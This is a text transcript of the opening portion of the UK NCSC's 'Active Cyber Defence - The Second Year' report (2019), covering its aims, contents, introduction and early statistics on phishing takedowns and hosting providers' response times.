Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence...

84

Transcript of Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence...

Page 1: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre
Page 2: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Active Cyber Defence - The Second Year

Dr Ian LevyTechnical Director

UK National Cyber Security Centre

Maddy S.Data Campaigns and Mission AnalyticsUK National Cyber Security Centre

15th July, 2019

LATEX

Page 3: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Abstract

The National Cyber Security Centre (NCSC) was set up in 2016 to be the single, authori-tative voice for cyber security in the UK. This was part of the wider National Cyber SecurityStrategy which sought to make government much more interventionist in the protection ofthe UK as a whole. Part of that interventionist strategy is the Active Cyber Defence (ACD)programme which seeks to reduce the harm from commodity cyber attacks against the UK.

One of the founding principles of the NCSC was making decisions based on evidence andbeing as transparent as possible in that. This report is the next step in building the evidencebase for ACD-like services and presents an honest analysis of the outcomes achieved in theUK.

This report covers a range of work across the following sets of ACD service areas :

• Takedown Service : removing malicious content so it can’t cause harm.

• Mail Check : helping domain owners understand and control abuse of their emaildomains.

• Domain Discovery : helping system owners understand what internet domains theyhave registered.

• Web Check : proactively scanning websites for simple vulnerabilities and issues.

• Protective DNS : protecting the public sector at scale from harmful internet stuff.

• Routing and signalling : protecting the protocols that route our traffic around theworld.

• Host-based capability : getting a handle on public sector IT.

• Vulnerability Disclosure Platform : making it easy to report vulnerabilities in govern-ment services.

• Suspicious email incubator : building a service to help the public report on suspiciousstuff and automatically take protective action.

The report also describes our scaling strategies for each of the services we believe couldbe of wider utility and work we intend to do in the coming year.

Despite the late publication date, this report still only covers the calendar year of 2018.This is to ensure we can compare sensibly the data in the previous report and the data inthis one. However, that does mean that there are projects in this report that we’ve alreadytalked about in more detail in public. It’s a bit weird. Sorry.

3

Page 4: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Acknowledgements

This paper has been much more of a team effort than the previous one, although I dotake sole responsibility for all errors, ommissions and jokes herein. The delay to the expectedpublication is also solely my fault.

Thanks to Maddy for doing the vast majority of the hard work on the data and a chunkof the drafting for this report (and thanks to Peter W for letting her have the time to doso).

Thanks to the ACD service teams and researchers for running the services in the firstplace, but also for supporting our ridiculous requests for data, in particular John H, Sam F,Jamie H, Peter H, Kieran C, David I, Richard E, Richard C, Lawrence I, Jon B and KateS.

Thanks to the socio-technical security group for keeping me honest about how we presentdata, in particular Helen L, Rachel P, Katie E and Andrew F. A big thanks to Kate A, myStaff Officer, for keeping everything running.

Many people, internal and external, helped with proofing the report at various stages,and you all have my gratitude, especially Simon B whose amazing command of English andextreme pedantry helps immensely.

Finally, thanks to everyone at the NCSC - you make this, and much more, all possible.

Dr. Ian Levy, 15th July 2019

4

Page 5: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Contents

1 Introduction 91.1 Numbers and effects . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 101.2 Feedback . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11

2 Takedowns 122.1 Last year in takedown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 122.2 Government related abuse . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 12

2.2.1 Phishing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 132.2.2 Case study: HMRC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 162.2.3 Government sending malware . . . . . . . . . . . . . . . . . . . . . . . . . 162.2.4 Malware infrastructure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192.2.5 Advance fee fraud . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 202.2.6 Deceptive domains . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21

2.3 Malicious hosting in UK IP space . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.3.1 UK IP space phishing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 222.3.2 Web-inject malware in UK IP space . . . . . . . . . . . . . . . . . . . . . 24

2.4 New types of takedown . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242.4.1 Web shells . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242.4.2 UK legal system advanced fee fraud . . . . . . . . . . . . . . . . . . . . . 272.4.3 Non-consensual Monero mining . . . . . . . . . . . . . . . . . . . . . . . . 272.4.4 Shopping site skimmers . . . . . . . . . . . . . . . . . . . . . . . . . . . . 28

2.5 Hosters’ takedown records . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 302.6 Deceptive domains . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 312.7 SSL certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 322.8 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33

3 Mail Check 343.1 DMARC and Microsoft . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343.2 Last year in Mail Check . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 343.3 On email providers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 353.4 Why we stopped collecting forensic reports . . . . . . . . . . . . . . . . . . . . . 353.5 Abuse of public sector email domains . . . . . . . . . . . . . . . . . . . . . . . . . 36

3.5.1 Spooftastic data . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363.5.2 Case study: Campaign using real domain . . . . . . . . . . . . . . . . . . 36

3.6 Synthetic DMARC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 363.6.1 Case study: Spoofing the aviation sector . . . . . . . . . . . . . . . . . . . 373.6.2 Case study: Merger of two public bodies . . . . . . . . . . . . . . . . . . . 383.6.3 Investigating failing mail . . . . . . . . . . . . . . . . . . . . . . . . . . . . 393.6.4 Spoofing from non-UK IP addresses . . . . . . . . . . . . . . . . . . . . . 403.6.5 Synthetic DMARC not universal . . . . . . . . . . . . . . . . . . . . . . . 40

3.7 The journey to reject . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 413.8 Is there a link between DMARC and phishing? . . . . . . . . . . . . . . . . . . . 423.9 Other research . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 423.10 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 44

4 Domain Discovery 47

5

Page 6: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

5 Web Check 485.1 Last year in Web Check . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 485.2 What does Web Check look for? . . . . . . . . . . . . . . . . . . . . . . . . . . . 485.3 Getting issues fixed . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51

5.3.1 Time to fix . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 515.3.2 How bad is it all? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51

5.4 Case study: X.509 certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 525.5 Third party resources . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 525.6 Case study: Symantec certificates . . . . . . . . . . . . . . . . . . . . . . . . . . 545.7 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54

6 Protective DNS 566.1 DNS and numbers . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566.2 Last year in protective DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 566.3 Infrastructure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 586.4 Feeds . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 606.5 Customer case studies . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 61

6.5.1 Remediating a worm at a local authority . . . . . . . . . . . . . . . . . . 616.5.2 USB infection . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 626.5.3 Multiple internet connections . . . . . . . . . . . . . . . . . . . . . . . . . 63

6.6 IPv6 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 646.7 Automated sharing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 646.8 Unintended benefits . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 646.9 Conclusion . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 65

7 Routing and signalling 667.1 BGP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 667.2 Source address spoofing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 667.3 BGP monitoring . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 667.4 SS7 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 677.5 SMS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 68

8 Host-based capability 69

9 Vulnerability Disclosure Platform 70

10 Suspicious Email Incubator 71

11 Scaling 7311.1 Takedowns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7311.2 DMARC . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7411.3 Web Check . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7511.4 DNS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 75

11.4.1 Academia . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7511.4.2 Health . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7511.4.3 The public . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 76

11.5 The UK ISPs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7611.6 The UK Registry . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77

11.6.1 Domain Health . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7711.6.2 Domain Watch . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 77

6

Page 7: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

11.6.3 Tackling criminal activity . . . . . . . . . . . . . . . . . . . . . . . . . . . 7811.7 Critical National Infrastructure . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78

12 Future work 7912.1 Exercise in a Box . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7912.2 Logging Made Easy . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 7912.3 Internet Weather Centre . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8012.4 Infrastructure Check . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 8112.5 Supplier Check . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81

13 Conclusion 83

List of Figures

1 Volume of HMG-related phishing URLs removed . . . . . . . . . . . . . . . . . . 132 Comparison of availability of HMG-related phishing sites between baseline and

2018.(500 bins,xmax = 500, 24 hours noted by vertical line) . . . . . . . . . . . . 143 HMRC-related takedowns and share of global phishing. . . . . . . . . . . . . . . 174 HMRC rank as a global phishing target. (Higher is better) . . . . . . . . . . . . 185 Mail servers abusing the HMG brand . . . . . . . . . . . . . . . . . . . . . . . . . 196 Groups of malware infrastructure taken down . . . . . . . . . . . . . . . . . . . . 207 Advance Fee Fraud related email account takedowns. . . . . . . . . . . . . . . . . 218 The number of attack groups hosted in UK IP space and taken down in 2017 and

2018 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 229 The number of attacks per group hosted in UK IP space in 2017 and 2018 . . . . 2310 The number of attacks per group worldwide . . . . . . . . . . . . . . . . . . . . . 2411 Percentage of phishing hosted in UK delegated IP space. . . . . . . . . . . . . . . 2512 Number of web-injects notified in the UK . . . . . . . . . . . . . . . . . . . . . . 2613 Web shells taken down in 2018. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2614 UK legal system related advance fee fraud attacks taken down . . . . . . . . . . . 2815 Non-consensual Monero mining instances hosted on UK delegated IP . . . . . . . 2916 Number of compromised Magento installations in the UK. . . . . . . . . . . . . . 3017 Volume of spoofed email using one particular public sector domain . . . . . . . . 3718 Volume of synthetic DMARC reports received . . . . . . . . . . . . . . . . . . . . 3819 Volume of email blocked by synthetic DMARC records . . . . . . . . . . . . . . . 3920 Volume of emails related to aviation related campaign . . . . . . . . . . . . . . . 4021 Histogram of time for domains to get to p = reject (bin width=7 days, xmax = 550). 4222 Relationship between DMARC adoption and phishing attacks for public sector . 4323 t-SNE visualisation of clustering of high volume IP address features . . . . . . . 4524 Histogram of time to fix urgent and advisory issues (250 bins, xmax = 365) . . . 5125 Number of issues fixed in 2018, grouped by severity . . . . . . . . . . . . . . . . . 5226 Number of X.509-related advisories issued in 2018 . . . . . . . . . . . . . . . . . 5327 Number of affected certificates . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5528 Peak queries per second in 2018 . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5729 Number of unique blocks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 5930 Number of unique blocks, normalised by number of active organisations . . . . . 5931 Remediation of a Ramnit infection . . . . . . . . . . . . . . . . . . . . . . . . . . 6132 Traffic from a USB-installed malware infection . . . . . . . . . . . . . . . . . . . 6233 Number of blocks relating to unauthorised software . . . . . . . . . . . . . . . . . 63

7

Page 8: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

List of Tables

1 Statistics of availability of HMG-related phishing sites, before and after intervention 142 Comparison of availability of top 10 HMG-related phishing hosters . . . . . . . . 153 Top 10 phishing takedowns in 2017 . . . . . . . . . . . . . . . . . . . . . . . . . . 154 Top 10 phishing takedowns in 2018 . . . . . . . . . . . . . . . . . . . . . . . . . . 165 Most abused brands for advance fee fraud. . . . . . . . . . . . . . . . . . . . . . . 216 Statistics for baseline, 2017 and 2018 availability of phishing sites in UK IP space 237 Statistics for baseline, 2017 and 2018 availability of web-inject sites in UK IP space 258 Hosters failing takedowns . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 319 Top 10 certificate issuers for HMG-related phishing attacks . . . . . . . . . . . . 3210 Top 10 certificate issuers for UK hosted phishing attacks . . . . . . . . . . . . . . 3211 Volume of synthetic DMARC reports . . . . . . . . . . . . . . . . . . . . . . . . . 3812 Top five DMARC reporters in January 2019 . . . . . . . . . . . . . . . . . . . . . 4113 Top five Synthetic DMARC reporters in January 2019 . . . . . . . . . . . . . . . 4114 Distribution of IP addresses sending email and their disposition . . . . . . . . . . 4415 Web Check comparison in numbers - 2017 and 2018 . . . . . . . . . . . . . . . . 4816 Web Check advisories - 2017 and 2018 . . . . . . . . . . . . . . . . . . . . . . . . 5017 Scale of third party resources used in Web Check-scanned sites . . . . . . . . . . 5318 Comparison of unique blocks for the last two months of 2017 and 2018 . . . . . . 5819 Number of customers and unique blocks by the DNS service over 2018 . . . . . . 5820 Effect of each threat feed in December 2018 . . . . . . . . . . . . . . . . . . . . . 6021 Comparison of volume of IPv4 and IPv6 requests . . . . . . . . . . . . . . . . . . 64

8

Page 9: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

1 Introduction

The UK continues to be one of the most digital economies in the world, with ever more of ourlives being online. As this digitalisation continues, the potential real world impact on real peopleof cyber crime and cyber attack increases. As more of our lives are lived online, more of our livescan be affected by online harms.

The government’s National Cyber Security Strategy from 2015 seeks to address the cybersecurity related harms in an interventionist manner to actively reduce the online harm to UKcitizens and businesses. Part of that strategy is the NCSC’s Active Cyber Defence (ACD)programme. After the first full year of operation of the programme, we published1 the ‘ACDOne Year On’ report, detailing the things we had done and the effects they had achieved. Thisreport covers the second year of the ACD programme and again seeks to show the effects thethings we’ve built have had. We do not repeat what was described in the previous report wheremechanisms are identical, but we do repeat data where year-on-year comparisons are helpful.

The ACD Programme intends to ‘Protect the majority of people in the UK from the majorityof the harm caused by the majority of the cyber attacks the majority of the time.’ The ACDprogramme is about commodity attacks; other NCSC work seeks to disrupt targeted attacks fromvery sophisticated actors. Obviously, we neither seek nor claim to thwart every possible attackagainst the UK. In broad terms, we intend to raise the cost and risk of mounting commoditycyber attacks against the UK, thereby reducing the return on investment for the criminals. Aswe described last year, cyber crime really does run on a return on investment model and if wecan affect that, we can demotivate attackers from targeting the UK. ACD services are relativelysimple, but run at large scale. This seems to have the right sort of effect, as we shall try todemonstrate in this paper.

The services we introduced last year have all evolved and continue to provide real benefit tothe UK, as we will show. We’ve also introduced some new services, although each of them are at arelatively early stage and so any conclusions drawn from them will be inherently tentative. We’vealso worked hard to ensure that the services we have created are usable by doing some proper,evidence-based user research and testing. Perhaps the rest of the cyber security community couldthink about doing the same to make cyber security services more accessible to all.

The aim of this paper is to provide an evidence base to help judge the effectiveness of theACD measures and to do so in a transparent way, as per the NCSC’s stated aims. Despite havingmore data than last year, to quote last year’s paper, there is still ‘plenty of weird in the data’.Sometimes there are artefacts that we cannot reasonably determine a cause for. Sometimes weare not confident enough to draw a conclusion, even though there appears to be an obviouscorrelation.

Of course, correlation does not imply causation. We may present two features that we believeto be related, alongside our rationale for believing it, but we will always be upfront about thelimitations of our analysis, and indeed of ACD itself. ACD is great at picking off the mostcommon (and often most damaging) cyber vulnerabilities and attacks, but it does not aim to fixeverything wrong with cyber security.

Finally, improving the cyber security of the UK is far from a solo effort. ACD is but onefunction of the NCSC. The NCSC is but one organisation trying to reduce the harm from cyberattack in the UK, alongside other government departments, charities, companies and individuals.We’d be remiss if we didn’t thank all of our partners for their work in protecting the UK.

1https://www.ncsc.gov.uk/blog-post/active-cyber-defence-one-year

9

Page 10: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

1.1 Numbers and effects

What does ‘good’ look like for ACD? The ultimate goal, really, is for there to be fewer cyberattacks in the world, and more specifically, less harm from cyber attack globally. One step downfrom that is that there should be fewer cyber attacks targeting UK citizens, brands, businessesand government, and that the UK should become a hostile space for attackers to host theirattacks.

What should the data look like for a successful ACD service? How can we know we’re havingthe right effect?

Consider the following services:

• Web Check helps make websites a less attractive target, by finding obvious security issuesand pointing them out to the website’s owner so they can fix them.

• Mail Check helps public sector organisations take control of their email, making phishingattacks which spoof those organisations more difficult.

• Protective DNS blocks public sector organisations from accessing known malicious domains.

• The Takedown Service finds malicious sites (either attacks or attack-supporting infras-tructure) and sends notifications to the hoster or owner to get them removed from theinternet.

These services all have similar characteristics: looking for something that causes harm andintervening to reduce that harm, either by blocking access or removing the underlying artefact.You can probably make a case for both upward and downward trendlines of activity beingpositive:

• Upward trendline - we’re taking down/blocking more attacks, making attackers more frus-trated and less likely to target us. We’re doing our job!

• Downward trendline - we’re making it harder to do bad things so there are fewer attacksto take down. We’re doing our job!

If we assume that ACD services are intervening in places where a market failure has engen-dered a particular problem, we’d expect the early stages of a service to find a lot of examples ofthat problem. For example, when someone initially signs up to Web Check, we’re not expectingthem to have a perfect website, we’re expecting to find issues. We’re not expecting someonejoining Mail Check to have perfectly protected their email domains and we are expecting crim-inals to be abusing those unprotected domains. When we start blocking a particular maliciousURL with Protective DNS, we expect to see lots of public sector entities attempt connections tothat resource, followed by a marked drop off as the campaign winds down. This is similar forthe Takedown Service.

So in general, for services of this character, we could expect to see a hump of bad, with thattailing off relatively quickly, followed by quite a lot of ‘good’ (i.e. absence of that bad). Butthings are never that simple. Turns out there are lots of horrible, intricate questions that we’restarting to tackle, mostly centred around the question: ‘But what do the humps and numbersmean?’ Using Takedown as an example:

• When takedown numbers start going up : ‘Are we taking down more attacks because we’regetting better at finding them, or are we taking down more attacks because there are moreoverall?’

10

Page 11: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

• When takedown numbers start doing down : ‘Are we taking down fewer attacks becauseattackers are getting dissuaded, or is our way of detecting these attacks becoming lesseffective?’

Again, it’s not that simple. The trendlines seem to look more like a hump. When you takeinto account the initial setup, tuning and then adversary response this kind-of makes sense.However, how do we account for new versions of an existing attack? Can we identify what pointof an ‘attack lifecycle’ they’re at (pre-hump, mid-hump...)? Do all types of attack have the sameshape hump, or are there different shape humps for different types of attack? We don’t answerall those questions for all services in this paper. As per last year, we welcome help. If you’ve gotsomething to add to this debate, please do get in touch, using the details in section 1.2.

There’s also the potential unintended consequence of driving attackers to a place we can’tsee them, or mitigate their impact in an automated manner. We have certainly seen adversarybehaviour change correlated with ACD service scaling. In some cases, it’s obviously causal. Inother places, it’s more difficult to make a causal link. However, in all cases of adversary behaviourchange, they’ve moved in a way that we’ve been able to adapt to. That may not always be thecase, obviously.

We’ve been asked if we’re causing the unintended consequence of raising attackers’ skill levels.While that’s certainly going to happen, we’re also likely to see a form of ‘cyber-Darwinism’2 takehold. One of the pernicious characteristics of cyber attack is that it’s easy to enable others withless skill to purport attacks. That’s different to the real world. If you put up a burglar alarm,CCTV, a good lock and so on, burglars will be discouraged from trying to get into your house. Iflots of people do this in your neighbourhood, it will become less attractive for burglars to wanderyour local streets. Figuring out a way to neutralise your alarm, break your lock and cover yourcameras is simply not worth their time or effort, or the risk it comes with. It is incredibly unlikelythat they’ll suddenly become ‘super-burglars’ and go all Ocean’s 11 on you. They’re much morelikely to go a few streets away. And if you do have a Hollywood-type master criminal, he or sherobbing a house with awesome security doesn’t enable all the local, low level burglars to do thesame.

In tackling the commodity, common attacks that take little skill and scale well in terms ofharm, we’re trying to make the UK a more difficult target. The data in this paper appears toshow that we’re having a decent impact. Remember, this report covers the calendar year 2018,despite being published quite late.

1.2 Feedback

We genuinely do welcome feedback on this paper and the ACD programme in general. If you wantto offer research help, a different interpretation of the data, complementary data or just have agood old rant at us, please do get in touch either directly via email to [email protected] on our social media channels. We received a lot of contact last year and tried to reply toeveryone individually (except the really ranty aluminium millinophiles3). We’ll do so again thisyear, so please be patient if you do get in touch.

2This is intended to suggest that the Darwinian imperative will apply and the less skilled attackers will becomeless likely to succeed and so become less of a problem.

3Oh come on. Tin foil hat wearers.

11

Page 12: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

2 Takedowns

The year covered by this report, 2018, is the second full year that Netcraft has run a takedownservice on behalf of the NCSC. For full details of the original services, see last year’s ACD report.At a high level, we look for various bad artefacts on the internet and have them removed at sourceso they can’t cause further harm. This is done through noting to the various entities that hostthis stuff that the artefact (be it a phishing site, malware distribution URL, mailbox to receivepersonal data from an advanced fee fraud attack or whatever) is contrary to their own terms andconditions and asking, very nicely, if they wouldn’t mind awfully removing it. We do not servelegal papers on the hosters; there’s a timescale mismatch there.

As per last year, our statistics use grouped attacks as a measure, except where specificallystated. Similar individual attacks are grouped together so we can understand the number of‘campaigns’. This is useful as it allows us to see, roughly, the number of attack campaigns,rather than one very determined attacker dominating the statistics with a massive campaign. Italso keeps the numbers more reasonable so that the numbers out of context don’t infer a level ofharm that’s not warranted.

2.1 Last year in takedown

In 2018, we continued the services from 2017 in an identical manner to ensure that we canperform a comparative analysis. We also added a few new services, which we detail later. Theseare removal of web shells in the UK, notification of non-consensual Monero mining on UK sites,managing advance fee fraud using the UK legal system as a lure, and compromise of UK basedMagento shopping carts with credit card skimming code.

In 2017, we performed a total of 219, 992 takedowns and in 2018 the number of takedownswas 192, 256. Interestingly, in 2017, these were distributed across 72, 975 unique IP addressesand linked to 99, 543 campaigns. In 2018, only 24, 320 unique IP addresses hosted things wewere interested in and there were only 51, 569 campaigns. In general, across 2018, the medianavailability of things we sent takedowns for was 9 hours, 64% of them were down in 24 hoursand 99.3% eventually went down4.

While there is a small reduction in the number of overall takedowns, there is a significantreduction in the number of related campaigns and the IP addresses hosting the malicious content.This suggests that criminals are using less infrastructure and hosting more individual attackson each instance as part of a campaign. This could suggest that it is becoming harder to hostattacks that we are interested in. There could be other explanations due to causes hidden fromus, but we are unaware of any other systemic work that could obviously cause that sort of effect.This does suggest that we are achieving our overall goal or making the UK (and UK-relatedbrands) unattractive for cyber crime.

2.2 Government related abuse

We take a very broad view of the ‘HMG brand’ that we protect, partly because we’re tryingto reduce harm and partly to help us understand how attackers develop their methodologies inresponse to our mitigations. Some of the entities we are concerned with might not be identifiedimmediately as government, for example well known universities or the BBC. Each of these isa well-known brand, is likely to be thought of as trustworthy and, as such, could be a popular

4The majority of the ones that weren’t down at the end of 2018 were reported in the last few days of the yearand went down soon into 2019.

12

Page 13: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

target for attackers. Attackers spoofing these brands are aiming to add a layer of perceivedlegitimacy to their attack, and so increase their chances of success.

2.2.1 Phishing

One of the ways we protect the HMG brand is by taking down phishing URLs that impersonategovernment-related entities. We talked in detail in our previous report about how these attackswork, and what we’re doing to remove them.

In 2018, we removed 14, 124 HMG-related phishing sites, distributed as per figure 1. Forcomparison, last year we reported that we had removed 18, 067 HMG-related phishing sites andin the six months prior to that 19, 443 sites. That seems to be a good downward trend.

Jan

Feb

Mar

Ap

r

May

Ju

n

Ju

l

Au

g

Sep

Oct

Nov

Dec

0

500

1,000

1,500

2,000

Month (2018)

Nu

mb

erof

Taked

own

s

Figure 1: Volume of HMG-related phishing URLs removed

Table 1 shows the summary statistics for the availability of grouped HMG-related phishingattacks for 2018, with the statistics for 2017 and our baseline before intervention for comparison.Figure 2 also shows the histogram of takedown times for the baseline and 2018. While thestatistics for this year are still much better than the baseline, they are slightly worse than lastyear.

This is an odd effect to see given the smaller number of attacks we have seen in 2018 comparedto 2017. The one thing that we have no control over is the hosting provider used by the phishers.In 2017, we saw 587 different hosting companies used and this dropped to 451 in 2018. Thevast majority of hosting companies are used for one or two attacks and so their responsivenessis unlikely to massively skew our statistics. Table 2 shows the top 10 companies used to hostHMG-related phishing attacks in 2017 and 2018, along with the median availability in hours ofthe attacks they host.

In 2017, the top 10 hosters accounted for 36.5% of all HMG-related phishing while in 2018they accounted for 48.3%. The weighted average availability in 2017 across the top 10 hosters

13

Page 14: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

Measure Baseline Value 2017 Value 2018 ValueMean (hours) 281.1 104.8 197.3

Median (hours) 42.6 10.0 12.7Skewness 3.2 7.2 5.8

25th percentile (hours) 6.4 1.7 1.475th percentile (hours) 250.8 42.9 78.0Sites down in 4 hours 21.4% 39.5% 37.0%Sites down in 24 hours 39.0% 65.8% 60.0%

Table 1: Statistics of availability of HMG-related phishing sites, before and after intervention

0

200

400

600

800

Attack availability (hours)

Nu

mb

erof

Taked

own

s

Baseline

(a) Histogram of baseline availability for HMG-related phishing

0

200

400

600

800

Attack availability (hours)

Nu

mb

erof

Tak

edow

ns

2018

(b) Histogram of availability in 2018 for HMG-related phishing

Figure 2: Comparison of availability of HMG-related phishing sites between baseline and2018.(500 bins,xmax = 500, 24 hours noted by vertical line)

was 11.8 hours, while in 2018 it was 32.0 hours. That’s significantly worse. By inspection, wecan see that both GoDaddy and OVH were significantly slower in removing malicious contentin 2018 than they were in 2017, and they accounted for significantly more of the HMG-relatedphishing hosting. New entrants Shinjuru Technology, Webafrica and DigitalOcean all also hadvery long availability times, indicating they are not responsive to takedown requests.

Most of these providers are very large with a high share of websites worldwide. The factthey host a high share of phishing websites is therefore not surprising. It’s interesting to lookat some of the biggest providers and their responsiveness to takedowns and the hosters whoare bad at even actioning takedown requests, detailed in section 2.5. It would be interesting tolook at the commonality in business models, over and above that they all offer a free service ofsome sort, that allow for such prevalence - and sometimes bad takedown performance - to occur.Something like this may make a nice academic study5. We are in discussions with GoDaddyto help optimise the interaction between our takedown processes, with GoDaddy saying “Weappreciate the opportunity to work with the NCSC on the important topic of phishing prevention.We take these issues very seriously and are constantly looking for ways to improve how we handlethese reports.” It’s great to see a company taking responsibility and we hope the data next year

5Hint, hint.

14

Page 15: Active Cyber Defence - The Second Year Cyber Defence-The... · 2019-09-11 · Active Cyber Defence - The Second Year Dr Ian Levy Technical Director UK National Cyber Security Centre

2017 2018Hoster Share (%) Availability Hoster Share (%) Availability

(hours) (hours)Endurance International 9.3 2.3 GoDaddy 17.3 53.0

GroupGoDaddy 6.9 32.4 Endurance International 10.5 2.1

GroupAmazon 4.3 9.0 OVH 4.1 25.9

OVH 3.7 11.0 Amazon 3.4 9.2United Internet 3.3 13.0 Cloudflare 3.2 5.5Hetzner Online 2.1 5.0 Shinjiru Technology 2.9 68.5

Dynamic Network Services 1.9 0.9 Webafrica 2.7 50.7Host Europe Group 1.8 9.5 United Internet 1.5 17.8

